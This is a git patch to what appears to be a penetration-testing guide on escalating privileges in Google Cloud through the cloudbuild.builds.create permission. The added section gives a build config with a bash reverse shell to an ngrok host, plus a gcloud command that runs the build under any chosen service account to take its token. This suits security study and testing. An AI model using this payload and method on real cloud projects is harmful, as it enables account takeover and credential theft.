From 65da889db0f59f4f1174443c59d448c9685f7ba8 Mon Sep 17 00:00:00 2001
From: hasshido <hasshido@gmail.com>
Date: Wed, 30 Jul 2025 21:00:52 +0200
Subject: [PATCH] Update cloudbuild.builds.create exploitation method

Includes direct gcloud command descriptioon to exploit this permission.
---
 .../gcp-cloudbuild-privesc.md                  | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
index c7fe2f0be..5557616d1 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
@@ -15,6 +15,24 @@ For more information about Cloud Build check:
 With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the cloudbuild Service Account**: `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com`. However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
 Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change).
 
+#### Direct exploitation via gcloud CLI
+
+1- Create `cloudbuild.yaml` and modify with your listener data
+```yaml
+steps:
+  - name: bash
+    script: |
+      #!/usr/bin/env bash
+      bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1
+options:
+  logging: CLOUD_LOGGING_ONLY
+```
+2- Upload a simple build with no source, the yaml file and specify the SA to use on the build:
+```bash
+gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects/<PROJECT>/serviceAccounts/<SERVICE_ACCOUNT_ID>@<PROJECT_ID>.iam.gserviceaccount.com
+```
+
+#### Using python gcloud library
 You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
 
 For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)